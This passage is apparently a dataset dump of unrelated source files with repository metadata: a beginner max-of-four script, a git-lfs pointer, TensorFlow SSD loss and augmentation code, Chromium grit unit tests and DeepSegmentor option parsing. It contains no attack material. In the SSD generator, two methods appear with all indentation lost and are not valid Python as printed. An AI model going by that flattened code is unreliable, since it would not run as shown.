    greatest = num2
elif num3 > num1 and num3 > num2 and num3 > num4:
    greatest = num3
else:
    greatest = num4
print("The greater no is", greatest)
| [
"shanususan@gmail.com"
] | shanususan@gmail.com |
5360f0f0d9b911bb3033292064920cc4edcb718e | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Flask/Book_evaluator/venv/Lib/site-packages/urllib3/util/__init__.py | 130a48f4f4e13e706d68fa3f49aa7081eb6997c7 | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:e916a7e28015232e340aefe810f5a7355f5bc05e6b5f1e86d43519ee87a18cf6
size 1044
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
bc9f78070db898ead3722ca20a6f26dedfe71f55 | 2c12dbd152d3483f54bf8cb619d9dfc070c90612 | /nets/ssd_training.py | 380e5b09989b43ecc318fa58cf1757cbbad02624 | [] | no_license | simon108018/MobileNetV2-SSD | 3647ad0dba236e8f08aac3adbdc974959647f240 | 5d1ceec17db92647de771439c0deed3d88f36aef | refs/heads/main | 2023-02-01T03:24:25.897596 | 2020-12-18T07:44:55 | 2020-12-18T07:44:55 | 322,504,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,311 | py | import tensorflow as tf
from random import shuffle
import numpy as np
import cv2
from PIL import Image
from tensorflow.keras.applications.imagenet_utils import preprocess_input
from tensorflow.keras import backend as K
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
class MultiboxLoss(object):
    """SSD multibox loss with online hard negative mining.

    Per prior box, the last axis of y_true/y_pred holds [0:4] encoded box
    offsets, [4:-8] one-hot class confidences, and a trailing 8-wide block
    of which only index -8 is used here: the positive-match indicator
    (1 when the prior matched a ground-truth box).
    """
    def __init__(self, num_classes, alpha=1.0, neg_pos_ratio=3.0,
                 background_label_id=0, negatives_for_hard=100.0):
        # num_classes: class count including background.
        # alpha: weight of the localisation term in the total loss.
        # neg_pos_ratio: mined hard negatives per positive prior.
        # negatives_for_hard: negatives to mine when a batch has no positives.
        self.num_classes = num_classes
        self.alpha = alpha
        self.neg_pos_ratio = neg_pos_ratio
        if background_label_id != 0:
            raise Exception('Only 0 as background label id is supported')
        self.background_label_id = background_label_id
        self.negatives_for_hard = negatives_for_hard
    def _l1_smooth_loss(self, y_true, y_pred):
        """Smooth-L1 (Huber) loss, summed over the last axis."""
        abs_loss = tf.abs(y_true - y_pred)
        sq_loss = 0.5 * (y_true - y_pred) ** 2
        # Quadratic for |error| < 1, linear (shifted by -0.5) beyond.
        l1_loss = tf.where(tf.less(abs_loss, 1.0), sq_loss, abs_loss - 0.5)
        return tf.reduce_sum(l1_loss, -1)
    def _softmax_loss(self, y_true, y_pred):
        """Cross-entropy against already-normalised class probabilities."""
        # Clamp to avoid log(0).
        y_pred = tf.maximum(y_pred, 1e-7)
        softmax_loss = -tf.reduce_sum(y_true * tf.math.log(y_pred),
                                      axis=-1)
        return softmax_loss
    def compute_loss(self, y_true, y_pred):
        """Return the scalar SSD loss for a batch: confidence loss over
        positives plus the hardest negatives, plus alpha-weighted
        localisation loss over positives, normalised by positive count."""
        batch_size = tf.shape(y_true)[0]
        num_boxes = tf.cast(tf.shape(y_true)[1], tf.float32)
        # Per-prior classification loss:
        # batch_size,8732,21 -> batch_size,8732
        conf_loss = self._softmax_loss(y_true[:, :, 4:-8],
                                       y_pred[:, :, 4:-8])
        # Per-prior localisation loss:
        # batch_size,8732,4 -> batch_size,8732
        loc_loss = self._l1_smooth_loss(y_true[:, :, :4],
                                        y_pred[:, :, :4])
        # Number of positive (matched) priors per image; y_true[..., -8]
        # is the positive-match mask.
        num_pos = tf.reduce_sum(y_true[:, :, -8], axis=-1)
        # Localisation loss restricted to positives, per image.
        pos_loc_loss = tf.reduce_sum(loc_loss * y_true[:, :, -8],
                                     axis=1)
        # Confidence loss restricted to positives, per image.
        pos_conf_loss = tf.reduce_sum(conf_loss * y_true[:, :, -8],
                                      axis=1)
        # Negatives requested per image, capped by the priors remaining.
        num_neg = tf.minimum(self.neg_pos_ratio * num_pos,
                             num_boxes - num_pos)
        # Which images request at least one negative.
        pos_num_neg_mask = tf.greater(num_neg, 0)
        # 1.0 if any image has negatives to mine, else 0.0.
        has_min = tf.cast(tf.reduce_any(pos_num_neg_mask), tf.float32)
        # Fallback: mine a fixed count when no image has positives at all.
        num_neg = tf.concat(axis=0, values=[num_neg,
                                            [(1 - has_min) * self.negatives_for_hard]])
        # Average number of negatives to take per image.
        num_neg_batch = tf.reduce_mean(tf.boolean_mask(num_neg,
                                                       tf.greater(num_neg, 0)))
        num_neg_batch = tf.cast(num_neg_batch, tf.int32)
        # Confidence slice holding the non-background classes.
        confs_start = 4 + self.background_label_id + 1
        confs_end = confs_start + self.num_classes - 1
        # Strongest (non-background) confidence per prior -- high values on
        # unmatched priors are the hard negatives we want.
        max_confs = tf.reduce_max(y_pred[:, :, confs_start:confs_end],
                                  axis=2)
        # Top-k most confident unmatched priors become the negatives.
        _, indices = tf.nn.top_k(max_confs * (1 - y_true[:, :, -8]),
                                 k=num_neg_batch)
        # Convert (image, prior) pairs into flat 1-D indices.
        batch_idx = tf.expand_dims(tf.range(0, batch_size), 1)
        batch_idx = tf.tile(batch_idx, (1, num_neg_batch))
        full_indices = (tf.reshape(batch_idx, [-1]) * tf.cast(num_boxes, tf.int32) +
                        tf.reshape(indices, [-1]))
        # full_indices = tf.concat(2, [tf.expand_dims(batch_idx, 2),
        #                              tf.expand_dims(indices, 2)])
        # neg_conf_loss = tf.gather_nd(conf_loss, full_indices)
        neg_conf_loss = tf.gather(tf.reshape(conf_loss, [-1]),
                                  full_indices)
        neg_conf_loss = tf.reshape(neg_conf_loss,
                                   [batch_size, num_neg_batch])
        neg_conf_loss = tf.reduce_sum(neg_conf_loss, axis=1)
        # loss is sum of positives and negatives
        # Guard the division below for images without positives.
        num_pos = tf.where(tf.not_equal(num_pos, 0), num_pos,
                           tf.ones_like(num_pos))
        total_loss = tf.reduce_sum(pos_conf_loss) + tf.reduce_sum(neg_conf_loss)
        total_loss /= tf.reduce_sum(num_pos)
        total_loss += tf.reduce_sum(self.alpha * pos_loc_loss) / tf.reduce_sum(num_pos)
        return total_loss
def rand(a=0, b=1):
    """Draw a uniform random float from the half-open interval [a, b)."""
    span = b - a
    return a + span * np.random.rand()
class Generator(object):
    def __init__(self, bbox_util, batch_size,
                 train_lines, val_lines, image_size, num_classes,
                 ):
        # bbox_util: helper used to assign ground-truth boxes to priors.
        # train_lines / val_lines: annotation lines of the form
        #   "img_path x1,y1,x2,y2,cls ..." (see get_random_data).
        # image_size: (h, w) passed to the augmentation step.
        # num_classes: total class count including background; the stored
        # value excludes the background class.
        self.bbox_util = bbox_util
        self.batch_size = batch_size
        self.train_lines = train_lines
        self.val_lines = val_lines
        self.train_batches = len(train_lines)
        self.val_batches = len(val_lines)
        self.image_size = image_size
        self.num_classes = num_classes - 1
def get_random_data(self, annotation_line, input_shape, jitter=.3, hue=.1, sat=1.5, val=1.5):
'''r实时数据增强的随机预处理'''
line = annotation_line.split()
image = Image.open(line[0])
iw, ih = image.size
h, w = input_shape
box = np.array([np.array(list(map(int, box.split(',')))) for box in line[1:]])
# resize image
new_ar = w / h * rand(1 - jitter, 1 + jitter) / rand(1 - jitter, 1 + jitter)
scale = rand(.5, 1.5)
if new_ar < 1:
nh = int(scale * h)
nw = int(nh * new_ar)
else:
nw = int(scale * w)
nh = int(nw / new_ar)
image = image.resize((nw, nh), Image.BICUBIC)
# place image
dx = int(rand(0, w - nw))
dy = int(rand(0, h - nh))
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
flip = rand() < .5
if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand() < .5 else 1 / rand(1, sat)
val = rand(1, val) if rand() < .5 else 1 / rand(1, val)
x = cv2.cvtColor(np.array(image, np.float32) / 255, cv2.COLOR_RGB2HSV)
x[..., 0] += hue * 360
x[..., 0][x[..., 0] > 1] -= 1
x[..., 0][x[..., 0] < 0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x[:, :, 0] > 360, 0] = 360
x[:, :, 1:][x[:, :, 1:] > 1] = 1
x[x < 0] = 0
image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB) * 255
# correct boxes
box_data = np.zeros((len(box), 5))
if len(box) > 0:
np.random.shuffle(box)
box[:, [0, 2]] = box[:, [0, 2]] * nw / iw + dx
box[:, [1, 3]] = box[:, [1, 3]] * nh / ih + dy
if flip: box[:, [0, 2]] = w - box[:, [2, 0]]
box[:, 0:2][box[:, 0:2] < 0] = 0
box[:, 2][box[:, 2] > w] = w
box[:, 3][box[:, 3] > h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w > 1, box_h > 1)] # discard invalid box
box_data = np.zeros((len(box), 5))
box_data[:len(box)] = box
if len(box) == 0:
return image_data, []
if (box_data[:, :4] > 0).any():
return image_data, box_data
else:
return image_data, []
def generate(self, train=True):
while True:
if train:
# 打乱
shuffle(self.train_lines)
lines = self.train_lines
else:
shuffle(self.val_lines)
lines = self.val_lines
inputs = []
targets = []
for annotation_line in lines:
img, y = self.get_random_data(annotation_line, self.image_size[0:2])
if len(y) != 0:
boxes = np.array(y[:, :4], dtype=np.float32)
boxes[:, 0] = boxes[:, 0] / self.image_size[1]
boxes[:, 1] = boxes[:, 1] / self.image_size[0]
boxes[:, 2] = boxes[:, 2] / self.image_size[1]
boxes[:, 3] = boxes[:, 3] / self.image_size[0]
one_hot_label = np.eye(self.num_classes)[np.array(y[:, 4], np.int32)]
if ((boxes[:, 3] - boxes[:, 1]) <= 0).any() and ((boxes[:, 2] - boxes[:, 0]) <= 0).any():
continue
y = np.concatenate([boxes, one_hot_label], axis=-1)
y = self.bbox_util.assign_boxes(y)
inputs.append(img)
targets.append(y)
if len(targets) == self.batch_size:
tmp_inp = np.array(inputs)
tmp_targets = np.array(targets)
inputs = []
targets = []
yield preprocess_input(tmp_inp), tmp_targets
| [
"noreply@github.com"
] | noreply@github.com |
13a4e0a500494230f0b097836ef8e1748b2c0f01 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /tools/grit/grit/format/resource_map_unittest.py | ecc997a180675ab38dc887c768b9bb3b395cddb7 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-unknown",
"MIT"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 12,456 | py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for grit.format.resource_map'''
import os
import sys
if __name__ == '__main__':
  # When executed directly from the source tree, make the top-level grit
  # package importable before the grit imports below.
  sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import StringIO
import unittest
from grit import grd_reader
from grit import util
from grit.format import resource_map
class FormatResourceMapUnittest(unittest.TestCase):
  """Tests for the resource_map_* formatters: parses an in-memory .grd
  document and compares the generated header/source/file-map output."""

  def testFormatResourceMap(self):
    """All defined resources are mapped, even those behind false <if>s."""
    grd = grd_reader.Parse(StringIO.StringIO(
      '''<?xml version="1.0" encoding="UTF-8"?>
      <grit latest_public_release="2" source_lang_id="en" current_release="3"
            base_dir=".">
        <outputs>
          <output type="rc_header" filename="the_rc_header.h" />
          <output type="resource_map_header"
                  filename="the_resource_map_header.h" />
        </outputs>
        <release seq="3">
          <structures first_id="300">
            <structure type="menu" name="IDC_KLONKMENU"
                       file="grit\\testdata\\klonk.rc" encoding="utf-16" />
          </structures>
          <includes first_id="10000">
            <include type="foo" file="abc" name="IDS_FIRSTPRESENT" />
            <if expr="False">
              <include type="foo" file="def" name="IDS_MISSING" />
            </if>
            <if expr="lang != 'es'">
              <include type="foo" file="ghi" name="IDS_LANGUAGESPECIFIC" />
            </if>
            <if expr="lang == 'es'">
              <include type="foo" file="jkl" name="IDS_LANGUAGESPECIFIC" />
            </if>
            <include type="foo" file="mno" name="IDS_THIRDPRESENT" />
          </includes>
        </release>
      </grit>'''), util.PathFromRoot('.'))
    grd.SetOutputLanguage('en')
    grd.RunGatherers()
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
    self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
  const char* const name;
  int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"IDC_KLONKMENU", IDC_KLONKMENU},
  {"IDS_FIRSTPRESENT", IDS_FIRSTPRESENT},
  {"IDS_MISSING", IDS_MISSING},
  {"IDS_LANGUAGESPECIFIC", IDS_LANGUAGESPECIFIC},
  {"IDS_THIRDPRESENT", IDS_THIRDPRESENT},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_file_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"grit/testdata/klonk.rc", IDC_KLONKMENU},
  {"abc", IDS_FIRSTPRESENT},
  {"def", IDS_MISSING},
  {"ghi", IDS_LANGUAGESPECIFIC},
  {"jkl", IDS_LANGUAGESPECIFIC},
  {"mno", IDS_THIRDPRESENT},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
  def testFormatResourceMapWithOutputAllEqualsFalseForStructures(self):
    """With output_all_resource_defines="false", only active <structure>
    elements (true <if> branches) appear in the generated map."""
    grd = grd_reader.Parse(StringIO.StringIO(
      '''<?xml version="1.0" encoding="UTF-8"?>
      <grit latest_public_release="2" source_lang_id="en" current_release="3"
            base_dir="." output_all_resource_defines="false">
        <outputs>
          <output type="rc_header" filename="the_rc_header.h" />
          <output type="resource_map_header"
                  filename="the_resource_map_header.h" />
          <output type="resource_map_source"
                  filename="the_resource_map_header.cc" />
        </outputs>
        <release seq="3">
          <structures first_id="300">
            <structure type="chrome_scaled_image" name="IDR_KLONKMENU"
                       file="foo.png" />
            <if expr="False">
              <structure type="chrome_scaled_image" name="IDR_MISSING"
                         file="bar.png" />
            </if>
            <if expr="True">
              <structure type="chrome_scaled_image" name="IDR_BLOB"
                         file="blob.png" />
            </if>
            <if expr="True">
              <then>
                <structure type="chrome_scaled_image" name="IDR_METEOR"
                           file="meteor.png" />
              </then>
              <else>
                <structure type="chrome_scaled_image" name="IDR_METEOR"
                           file="roetem.png" />
              </else>
            </if>
            <if expr="False">
              <structure type="chrome_scaled_image" name="IDR_LAST"
                         file="zyx.png" />
            </if>
            <if expr="True">
              <structure type="chrome_scaled_image" name="IDR_LAST"
                         file="xyz.png" />
            </if>
          </structures>
        </release>
      </grit>'''), util.PathFromRoot('.'))
    grd.SetOutputLanguage('en')
    grd.RunGatherers()
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
    self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
  const char* const name;
  int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"IDR_KLONKMENU", IDR_KLONKMENU},
  {"IDR_BLOB", IDR_BLOB},
  {"IDR_METEOR", IDR_METEOR},
  {"IDR_LAST", IDR_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"IDR_KLONKMENU", IDR_KLONKMENU},
  {"IDR_BLOB", IDR_BLOB},
  {"IDR_METEOR", IDR_METEOR},
  {"IDR_LAST", IDR_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
  def testFormatResourceMapWithOutputAllEqualsFalseForIncludes(self):
    """With output_all_resource_defines="false", only active <include>
    elements (true <if> branches) appear in the generated map."""
    grd = grd_reader.Parse(StringIO.StringIO(
      '''<?xml version="1.0" encoding="UTF-8"?>
      <grit latest_public_release="2" source_lang_id="en" current_release="3"
            base_dir="." output_all_resource_defines="false">
        <outputs>
          <output type="rc_header" filename="the_rc_header.h" />
          <output type="resource_map_header"
                  filename="the_resource_map_header.h" />
        </outputs>
        <release seq="3">
          <structures first_id="300">
            <structure type="menu" name="IDC_KLONKMENU"
                       file="grit\\testdata\\klonk.rc" encoding="utf-16" />
          </structures>
          <includes first_id="10000">
            <include type="foo" file="abc" name="IDS_FIRSTPRESENT" />
            <if expr="False">
              <include type="foo" file="def" name="IDS_MISSING" />
            </if>
            <include type="foo" file="mno" name="IDS_THIRDPRESENT" />
            <if expr="True">
              <include type="foo" file="blob" name="IDS_BLOB" />
            </if>
            <if expr="True">
              <then>
                <include type="foo" file="meteor" name="IDS_METEOR" />
              </then>
              <else>
                <include type="foo" file="roetem" name="IDS_METEOR" />
              </else>
            </if>
            <if expr="False">
              <include type="foo" file="zyx" name="IDS_LAST" />
            </if>
            <if expr="True">
              <include type="foo" file="xyz" name="IDS_LAST" />
            </if>
          </includes>
        </release>
      </grit>'''), util.PathFromRoot('.'))
    grd.SetOutputLanguage('en')
    grd.RunGatherers()
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
    self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
  const char* const name;
  int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"IDC_KLONKMENU", IDC_KLONKMENU},
  {"IDS_FIRSTPRESENT", IDS_FIRSTPRESENT},
  {"IDS_THIRDPRESENT", IDS_THIRDPRESENT},
  {"IDS_BLOB", IDS_BLOB},
  {"IDS_METEOR", IDS_METEOR},
  {"IDS_LAST", IDS_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_file_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"grit/testdata/klonk.rc", IDC_KLONKMENU},
  {"abc", IDS_FIRSTPRESENT},
  {"mno", IDS_THIRDPRESENT},
  {"blob", IDS_BLOB},
  {"meteor", IDS_METEOR},
  {"xyz", IDS_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
  def testFormatStringResourceMap(self):
    """Message (string) resources are mapped; false <if> branches are not."""
    grd = grd_reader.Parse(StringIO.StringIO(
      '''<?xml version="1.0" encoding="UTF-8"?>
      <grit latest_public_release="2" source_lang_id="en" current_release="3"
            base_dir=".">
        <outputs>
          <output type="rc_header" filename="the_rc_header.h" />
          <output type="resource_map_header" filename="the_rc_map_header.h" />
          <output type="resource_map_source" filename="the_rc_map_source.cc" />
        </outputs>
        <release seq="1" allow_pseudo="false">
          <messages fallback_to_english="true">
            <message name="IDS_PRODUCT_NAME" desc="The application name">
              Application
            </message>
            <if expr="True">
              <message name="IDS_DEFAULT_TAB_TITLE_TITLE_CASE"
                  desc="In Title Case: The default title in a tab.">
                New Tab
              </message>
            </if>
            <if expr="False">
              <message name="IDS_DEFAULT_TAB_TITLE"
                  desc="The default title in a tab.">
                New tab
              </message>
            </if>
          </messages>
        </release>
      </grit>'''), util.PathFromRoot('.'))
    grd.SetOutputLanguage('en')
    grd.RunGatherers()
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
    self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
  const char* const name;
  int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
    output = util.StripBlankLinesAndComments(''.join(
        resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
    self.assertEqual('''\
#include "the_rc_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
  {"IDS_PRODUCT_NAME", IDS_PRODUCT_NAME},
  {"IDS_DEFAULT_TAB_TITLE_TITLE_CASE", IDS_DEFAULT_TAB_TITLE_TITLE_CASE},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
# Allow running this test module directly: python resource_map_unittest.py
if __name__ == '__main__':
  unittest.main()
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
a3a1325e2e8ccff98c1e3529142fb6286b980da2 | 575d590bf6a401f36f4bf7c48fa3710486082794 | /options/base_options.py | f5b36f86a575a71b5fc8a679c5f2c959126e999d | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | hanyeliu/DeepSegmentor | cb16ed50d8a6161ec2eefde3cf243dabf86349c4 | 422141001d554029853d3d5ca3a772eb459bf0ca | refs/heads/master | 2022-01-22T16:55:10.595828 | 2019-07-21T02:05:05 | 2019-07-21T02:05:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,752 | py | import argparse
import os
from util import util
import torch
import models
import data
class BaseOptions():
    """This class defines options used during both training and test time.

    It also implements several helper functions such as parsing, printing, and saving the options.
    It also gathers additional options defined in <modify_commandline_options> functions in both dataset class and model class.
    """
    def __init__(self):
        """Reset the class; indicates the class hasn't been initailized"""
        # NOTE(review): self.isTrain is read in parse() but never set here —
        # presumably assigned by a Train/Test subclass; confirm.
        self.initialized = False
    def initialize(self, parser):
        """Define the common options that are used in both training and test."""
        # basic parameters
        parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')
        parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')
        parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0  0,1,2, 0,2. use -1 for CPU')
        parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')
        # model parameters
        parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]')
        parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale')
        parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale')
        parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')
        parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')
        parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')
        parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]')
        parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers')
        parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]')
        parser.add_argument('--init_type', type=str, default='xavier', help='network initialization [normal | xavier | kaiming | orthogonal]')
        parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')
        parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')
        # dataset parameters
        parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]')
        parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')
        parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')
        parser.add_argument('--num_threads', default=2, type=int, help='# threads for loading data')
        parser.add_argument('--batch_size', type=int, default=1, help='input batch size')
        parser.add_argument('--load_size', type=int, default=286, help='scale images to this size')
        parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size')
        parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')
        parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')
        parser.add_argument('--no_flip', type=int, default=1, help='if specified, do not flip the images for data augmentation')
        parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML')
        # additional parameters
        parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')
        parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')
        parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')
        parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')
        # for deepcrack
        parser.add_argument('--load_width', type=int, default=0, help='load image width')
        parser.add_argument('--load_height', type=int, default=0, help='load image height')
        parser.add_argument('--use_augment', type=int, default=1, help='using data augmentation for training')
        parser.add_argument('--display_sides', type=int, default=1, help='displaying the side output results')
        parser.add_argument('--num_classes', type=int, default=2, help='number of classes')
        #parser.add_argument('--use_l1', type=int, default=1, help='using l1 loss')
        parser.add_argument('--use_selu', type=int, default=1, help='using selu active function')
        self.initialized = True
        return parser
    def gather_options(self):
        """Initialize our parser with basic options(only once).
        Add additional model-specific and dataset-specific options.
        These options are difined in the <modify_commandline_options> function
        in model and dataset classes.
        """
        if not self.initialized:  # check if it has been initialized
            parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
            parser = self.initialize(parser)
        # get the basic options
        opt, _ = parser.parse_known_args()
        # modify model-related parser options
        model_name = opt.model
        model_option_setter = models.get_option_setter(model_name)
        parser = model_option_setter(parser, self.isTrain)
        opt, _ = parser.parse_known_args()  # parse again with new defaults
        # modify dataset-related parser options
        dataset_name = opt.dataset_mode
        dataset_option_setter = data.get_option_setter(dataset_name)
        parser = dataset_option_setter(parser, self.isTrain)
        # save and return the parser
        self.parser = parser
        return parser.parse_args()
    def print_options(self, opt):
        """Print and save options

        It will print both current options and default values(if different).
        It will save options into a text file / [checkpoints_dir] / opt.txt
        """
        message = ''
        message += '----------------- Options ---------------\n'
        for k, v in sorted(vars(opt).items()):
            comment = ''
            default = self.parser.get_default(k)
            if v != default:
                comment = '\t[default: %s]' % str(default)
            message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment)
        message += '----------------- End -------------------'
        print(message)
        # save to the disk
        expr_dir = os.path.join(opt.checkpoints_dir, opt.name)
        util.mkdirs(expr_dir)
        file_name = os.path.join(expr_dir, 'opt.txt')
        with open(file_name, 'wt') as opt_file:
            opt_file.write(message)
            opt_file.write('\n')
    def parse(self):
        """Parse our options, create checkpoints directory suffix, and set up gpu device."""
        opt = self.gather_options()
        opt.isTrain = self.isTrain   # train or test
        # process opt.suffix
        if opt.suffix:
            suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else ''
            opt.name = opt.name + suffix
        self.print_options(opt)
        # set gpu ids: parse the comma-separated string into a list of ints
        str_ids = opt.gpu_ids.split(',')
        opt.gpu_ids = []
        for str_id in str_ids:
            id = int(str_id)  # (shadows the builtin id(); harmless here)
            if id >= 0:
                opt.gpu_ids.append(id)
        if len(opt.gpu_ids) > 0:
